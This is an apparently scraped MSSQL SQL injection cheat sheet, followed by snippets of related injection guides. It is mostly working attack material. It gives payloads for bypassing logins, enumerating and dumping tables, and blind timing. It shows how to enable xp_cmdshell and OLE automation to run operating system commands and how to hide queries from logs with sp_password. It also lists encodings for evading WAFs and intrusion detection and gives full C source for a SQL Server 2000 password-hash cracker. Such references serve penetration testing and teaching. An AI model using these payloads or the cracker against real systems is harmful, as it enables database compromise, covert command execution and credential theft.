SQL Injection 字典 - MSSQL

MSSQL

Default Databases

pubs Not available on MSSQL 2005
model Available in all versions
msdb Available in all versions
tempdb Available in all versions
northwind Available in all versions
information_schema Availalble from MSSQL 2000 and higher

Comment Out Query

The following can be used to comment out the rest of the query after your injection:

/* C-style comment
-- SQL comment
;%00 Nullbyte

Example:

      • SELECT * FROM Users WHERE username = ‘‘ OR 1=1 --‘ AND password = ‘‘;
      • SELECT * FROM Users WHERE id = ‘‘ UNION SELECT 1, 2, 3/*‘;

Testing Version

      • @@VERSION

Example:

      • True if MSSQL version is 2008.
      • SELECT * FROM Users WHERE id = ‘1‘ AND @@VERSION LIKE ‘%2008%‘;

Note:

  • Output will also contain the version of the Windows Operating System.

Database Credentials

Database..Table master..syslogins, master..sysprocesses
Columns name, loginame
Current User user, system_user, suser_sname(), is_srvrolemember(‘sysadmin‘)
Database Credentials SELECT user, password FROM master.dbo.sysxlogins

Example:

      • Return current user:
      • SELECT loginame FROM master..sysprocesses WHERE [email protected]@SPID;
      • Check if user is admin:
      • SELECT (CASE WHEN (IS_SRVROLEMEMBER(‘sysadmin‘)=1) THEN ‘1‘ ELSE ‘0‘ END);

Database Names

Database.Table master..sysdatabases
Column name
Current DB DB_NAME(i)

Examples:

      • SELECT DB_NAME(5);
      • SELECT name FROM master..sysdatabases;

Server Hostname

@@SERVERNAME
SERVERPROPERTY()

Examples:

      • SELECT SERVERPROPERTY(‘productversion‘)SERVERPROPERTY(‘productlevel‘)SERVERPROPERTY(‘edition‘);

Note:

  • SERVERPROPERTY() is available from MSSQL 2005 and higher.

Tables and Columns

Determining number of columns

ORDER BY n+1;
Example:

Given the query: SELECT username, password, permission FROM Users WHERE id = ‘1‘;

1‘ ORDER BY 1-- True
1‘ ORDER BY 2-- True
1‘ ORDER BY 3-- True
1‘ ORDER BY 4-- False - Query is only using 3 columns
-1‘ UNION SELECT 1,2,3-- True

Note:

  • Keep incrementing the number until you get a False response.

The following can be used to get the columns in the current query.

GROUP BY / HAVING
Example:

Given the query: SELECT username, password, permission FROM Users WHERE id = ‘1‘;

1‘ HAVING 1=1-- Column ‘Users.username‘ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1‘ GROUP BY username HAVING 1=1-- Column ‘Users.password‘ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1‘ GROUP BY username, password HAVING 1=1-- Column ‘Users.permission‘ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1‘ GROUP BY username, password, permission HAVING 1=1-- No Error

Note:

  • No error will be returned once all columns have been included.

Retrieving Tables

We can retrieve the tables from two different databases, information_schema.tables or from master..sysobjects.

UNION SELECT name FROM master..sysobjects WHERE xtype=‘U‘

Note:

  • Xtype = ‘U‘ is for User-defined tables. You can use ‘V‘ for views.

Retrieving Columns

We can retrieve the columns from two different databases, information_schema.columns or masters..syscolumns.

UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = ‘tablename‘)

Retrieving Multiple Tables/Columns at once

The following 3 queries will create a temporary table/column and insert all the user-defined tables into it. It will then dump the table content and finish by deleting the table.

      • Create Temp Table/Column and Insert Data:
      • AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=‘:‘ SELECT @[email protected]+‘ ‘+name FROM sysobjects WHERE xtype=‘U‘ AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
      • Dump Content:
      • AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
      • Delete Table:
      • AND 1=0; DROP TABLE TMP_DB;

An easier method is available starting with MSSQL 2005 and higher. The XML function path() works as a concatenator, allowing the retrieval of all tables with 1 query.

SELECT table_name %2b ‘, ‘ FROM information_schema.tables FOR XML PATH(‘‘) SQL Server 2005+

Note:

  • You can encode your query in hex to "obfuscate" your attack.
  • ‘ AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

Avoiding the use of quotations

SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

String Concatenation

SELECT CONCAT(‘a‘,‘a‘,‘a‘); (SQL SERVER 2012)
SELECT ‘a‘+‘d‘+‘mi‘+‘n‘;

Conditional Statements

IF
CASE

Examples:

      • IF 1=1 SELECT ‘true‘ ELSE SELECT ‘false‘;
      • SELECT CASE WHEN 1=1 THEN true ELSE false END;

Note:

  • IF cannot be used inside a SELECT statement.

Timing

      • WAITFOR DELAY ‘time_to_pass‘;
      • WAITFOR TIME ‘time_to_execute‘;

Example:

      • IF 1=1 WAITFOR DELAY ‘0:0:5‘ ELSE WAITFOR DELAY ‘0:0:0‘;

OPENROWSET Attacks

SELECT * FROM OPENROWSET(‘SQLOLEDB‘, ‘127.0.0.1‘;‘sa‘;‘p4ssw0rd‘, ‘SET FMTONLY OFF execute master..xp_cmdshell "dir"‘);

System Command Execution

Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.

      • EXEC master.dbo.xp_cmdshell ‘cmd‘;

Starting with version MSSQL 2005 and higher, xp_cmdshell is disabled by default, but can be activated with the following queries:

EXEC sp_configure ‘show advanced options‘, 1
EXEC sp_configure reconfigure
EXEC sp_configure ‘xp_cmdshell‘, 1
EXEC sp_configure reconfigure

Alternatively, you can create your own procedure to achieve the same results:

DECLARE @execmd INT
EXEC SP_OACREATE ‘wscript.shell‘, @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, ‘run‘, null, ‘%systemroot%\system32\cmd.exe /c‘

If the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command:

EXEC sp_configure ‘show advanced options‘, 1
EXEC sp_configure reconfigure
EXEC sp_configure ‘OLE Automation Procedures‘, 1
EXEC sp_configure reconfigure

Example:

      • Checks to see if xp_cmdshell is loaded, if it is, it checks if it is active and then proceeds to run the ‘dir‘ command and inserts the results into TMP_DB:
      • ‘ IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME=‘TMP_DB‘) DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N‘[dbo].[xp_cmdshell]‘) AND OBJECTPROPERTY (id, N‘IsExtendedProc‘) = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure ‘xp_cmdshell‘ IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell ‘dir‘ SELECT @a=‘‘ SELECT @a=Replace(@a%2B‘<br></font><font color="black">‘%2Bdir,‘<dir>‘,‘</font><font color="orange">‘) FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a=‘xp_cmdshell not enabled‘ DROP TABLE %23xp_cmdshell END ELSE SELECT @a=‘xp_cmdshell not found‘ SELECT @a AS tbl INTO TMP_DB--
      • Dump Content:
      • ‘ UNION SELECT tbl FROM TMP_DB--
      • Delete Table:
      • ‘ DROP TABLE TMP_DB--

SP_PASSWORD (Hiding Query)

Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.

      • SP_PASSWORD

Example:

      • ‘ AND 1=1--sp_password

Output:

-- ‘sp_password‘ was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
					

Stacked Queries

MSSQL supports stacked queries.

Example:

      • ‘ AND 1=0 INSERT INTO ([column1], [column2]) VALUES (‘value1‘, ‘value2‘);

Fuzzing and Obfuscation

Allowed Intermediary Characters

The following characters can be used as whitespaces.

01 Start of Heading
02 Start of Text
03 End of Text
04 End of Transmission
05 Enquiry
06 Acknowledge
07 Bell
08 Backspace
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
0E Shift Out
0F Shift In
10 Data Link Escape
11 Device Control 1
12 Device Control 2
13 Device Control 3
14 Device Control 4
15 Negative Acknowledge
16 Synchronous Idle
17 End of Transmission Block
18 Cancel
19 End of Medium
1A Substitute
1B Escape
1C File Separator
1D Group Separator
1E Record Separator
1F Unit Separator
20 Space
25 %

Examples:

      • S%E%L%E%C%T%01column%02FROM%03table;
      • A%%ND 1=%%%%%%%%1;

Note:

  • The percentage signs in between keywords is only possible on ASP(x) web applications.

The following characters can be also used to avoid the use of spaces.

22 "
28 (
29 )
5B [
5D ]

Examples:

      • UNION(SELECT(column)FROM(table));
      • SELECT"table_name"FROM[information_schema].[tables];

Allowed Intermediary Characters after AND/OR

01 - 20 Range
21 !
2B +
2D -
2E .
5C \
7E ~

Example:

      • SELECT 1FROM[table]WHERE\1=\1AND\1=\1;

Note:

  • The backslash does not seem to work with MSSQL 2000.

Encodings

Encoding your injection can sometimes be useful for WAF/IDS evasion.

URL Encoding SELECT %74able_%6eame FROM information_schema.tables;
Double URL Encoding SELECT %2574able_%256eame FROM information_schema.tables;
Unicode Encoding SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP) SELECT %tab%le_%na%me FROM information_schema.tables;
Hex Encoding ‘ AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B

Password Hashing

Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercase version.

0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE91C0784B911D76BF4EB124550ACABDFD1457

Password Cracking

A Metasploit module for JTR can be found here.

MSSQL 2000 Password Cracker

This tool is designed to crack Microsoft SQL Server 2000 passwords.

/////////////////////////////////////////////////////////////////////////////////
//
//           SQLCrackCl
//
//           This will perform a dictionary attack against the
//           upper-cased hash for a password. Once this
//           has been discovered try all case variant to work
//           out the case sensitive password.
//
//           This code was written by David Litchfield to
//           demonstrate how Microsoft SQL Server 2000
//           passwords can be attacked. This can be
//           optimized considerably by not using the CryptoAPI.
//
//           (Compile with VC++ and link with advapi32.lib
//           Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
	         int err = 0;
	    if(argc !=3)
	              {
	                        printf("\n\n*** SQLCrack *** \n\n");
	                        printf("C:\\>%s hash passwd-file\n\n",argv[0]);
	                        printf("David Litchfield ([email protected])\n");
	                        printf("24th June 2002\n");
	                        return 0;
	              }
	    err = OpenPasswordFile(argv[2]);
	    if(err !=0)
	     {
	       return printf("\nThere was an error opening the password file %s\n",argv[2]);
	     }
	    err = CrackPassword(argv[1]);
	    fclose(fd);
	    printf("\n\n%d",wd);
	    return 0;
}
int OpenPasswordFile(char *pwdfile)
{
	    fd = fopen(pwdfile,"r");
	    if(fd)
	              return 0;
	    else
	              return 1;
}
int CrackPassword(char *hash)
{
	    char phash[100]="";
	    char pheader[8]="";
	    char pkey[12]="";
	    char pnorm[44]="";
	    char pucase[44]="";
	    char pucfirst[8]="";
	    char wttf[44]="";
	    char uwttf[100]="";
	    char *wp=NULL;
	    char *ptr=NULL;
	    int cnt = 0;
	    int count = 0;
	    unsigned int key=0;
	    unsigned int t=0;
	    unsigned int address = 0;
	    unsigned char cmp=0;
	    unsigned char x=0;
	    HCRYPTPROV hProv=0;
	    HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
	      {
	              return printf("\nThe password hash is too short!\n");
	      }
if(hash[0]==0x30 && (hash[1]== ‘x‘ || hash[1] == ‘X‘))
	      {
	              hash = hash + 2;
	              strncpy(pheader,hash,4);
	              printf("\nHeader\t\t: %s",pheader);
	              if(strlen(pheader)!=4)
	                        return printf("%s",lerr);
	              hash = hash + 4;
	              strncpy(pkey,hash,8);
	              printf("\nRand key\t: %s",pkey);
	              if(strlen(pkey)!=8)
	                        return printf("%s",lerr);
	              hash = hash + 8;
	              strncpy(pnorm,hash,40);
	              printf("\nNormal\t\t: %s",pnorm);
	              if(strlen(pnorm)!=40)
	                        return printf("%s",lerr);
	              hash = hash + 40;
	              strncpy(pucase,hash,40);
	              printf("\nUpper Case\t: %s",pucase);
	              if(strlen(pucase)!=40)
	                        return printf("%s",lerr);
	              strncpy(pucfirst,pucase,2);
	              sscanf(pucfirst,"%x",&cmp);
	      }
else
	      {
	              return printf("The password hash has an invalid format!\n");
	      }
printf("\n\n       Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL                 ,0))
  {
	      if(GetLastError()==NTE_BAD_KEYSET)
	              {
	                        // KeySet does not exist. So create a new keyset
	                        if(!CryptAcquireContext(&hProv,
	                                             NULL,
	                                             NULL,
	                                             PROV_RSA_FULL,
	                                             CRYPT_NEWKEYSET ))
	                           {
	                                    printf("FAILLLLLLL!!!");
	                                    return FALSE;
	                           }
	       }
}
while(1)
	     {
	       // get a word to try from the file
	       ZeroMemory(wttf,44);
	       if(!fgets(wttf,40,fd))
	          return printf("\nEnd of password file. Didn‘t find the password.\n");
	       wd++;
	       len = strlen(wttf);
	       wttf[len-1]=0x00;
	       ZeroMemory(uwttf,84);
	       // Convert the word to UNICODE
	       while(count < len)
	                 {
	                           uwttf[cnt]=wttf[count];
	                           cnt++;
	                           uwttf[cnt]=0x00;
	                           count++;
	                           cnt++;
	                 }
	       len --;
	       wp = &uwttf;
	       sscanf(pkey,"%x",&key);
	       cnt = cnt - 2;
	       // Append the random stuff to the end of
	       // the uppercase unicode password
	       t = key >> 24;
	       x = (unsigned char) t;
	       uwttf[cnt]=x;
	       cnt++;
	       t = key << 8;
	       t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 16;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 24;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
	     {
	               printf("Error %x during CryptCreatHash!\n", GetLastError());
	               return 0;
	     }
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
	     {
	               printf("Error %x during CryptHashData!\n", GetLastError());
	               return FALSE;
	     }
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
	     {
	               // If first byte matches try the rest
	               ptr = pucase;
	               cnt = 1;
	               while(cnt < 20)
	               {
	                           ptr = ptr + 2;
	                           strncpy(pucfirst,ptr,2);
	                           sscanf(pucfirst,"%x",&cmp);
	                           if(szhash[cnt]==cmp)
	                                    cnt ++;
	                           else
	                           {
	                                    break;
	                           }
	               }
	               if(cnt == 20)
	               {
	                    // We‘ve found the password
	                    printf("\nA MATCH!!! Password is %s\n",wttf);
	                    return 0;
	                 }
	         }
	         count = 0;
	         cnt=0;
	       }
  return 0;
}
					

SQL Injection 字典 - MSSQL

时间: 2024-11-05 13:04:04

SQL Injection 字典 - MSSQL的相关文章

SQL Injection 字典 - Oracle

Oracle Default Databases SYSTEM Available in all versions SYSAUX Available in all versions Comment Out Query The following can be used to comment out the rest of the query after your injection: -- SQL comment Example: SELECT * FROM Users WHERE userna

MySQL SQL Injection Cheat Sheet

MySQL SQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases- This post is part of a series of SQL Injection Cheat Sheets.  In this series, I've endevoured to tabulate the data to make it easier to read and to u

SQL Injection Attact

SQL 注入式攻击 当我们对一个运行IDS系统的服务器进行SQL注入时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法与大家分享. 一. 运用编码技术绕过,如URLEncode编码,ASCII编码绕过.如or?1=1即%6f%72%20%31%3d%31Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116) 二. 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除

使用sqlmap注入DVWA的SQL Injection菜单

1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用admin/password登陆系统,通过firebug工具获取cookie信息. 得到的cookie信息如下: security=low; path=/dvwa/; domain=192.168.0.112 PHPSESSID=0bec860709d15f590768b7713c69b52f; pa

Sql Injection 资料整理

注入类型 Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型注入) UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Time-based blind SQL injection(基于时间延迟注入) 数据库类型 -A:Access - M:MySQL- S:SQL Server- P:PostgreSQL-

新手指南:DVWA-1.9全级别教程之SQL Injection

*本文原创作者:lonehand,转载须注明来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正. DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,

DVWA系列之5 SQL Injection (Blind)

所谓盲注就是指当我们输入一些特殊字符时,页面并不显示错误提示,这样我们只能通过页面是否正常显示来进行判断. 将DVWA Security设置为low,然后选择SQL Injection (Blind),查看网页源码.可以发现与之前不同的是,在mysql_numrows()函数之前多加了一个@符号,后面的注释说明@符号可以抑制报错信息. 盲注其实对渗透并没有太大影响,我们输入"' or 1=1 #"仍然可以显示出所有的数据.整个渗透过程也与之前基本一致.

False SQL Injection and Advanced Blind SQL Injection

###################################################################### Exploit Title: False SQL injection and advanced blind SQL injection  ## Date: 21/12/2011              ## Author: wh1ant              ## Company: trinitysoft              ## Group:

SQL Injection(SQL注入漏洞)

审计前准备: 1.安?php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ###################### $_SERVER $_GET $_POST $_COOKIE $_REQUEST $_FILES $_ENV $_HTTP_COOKIE_VARS $_HTTP_ENV_VARS $_HTTP_GET_VARS $_HTTP_POST_FILES $_HTTP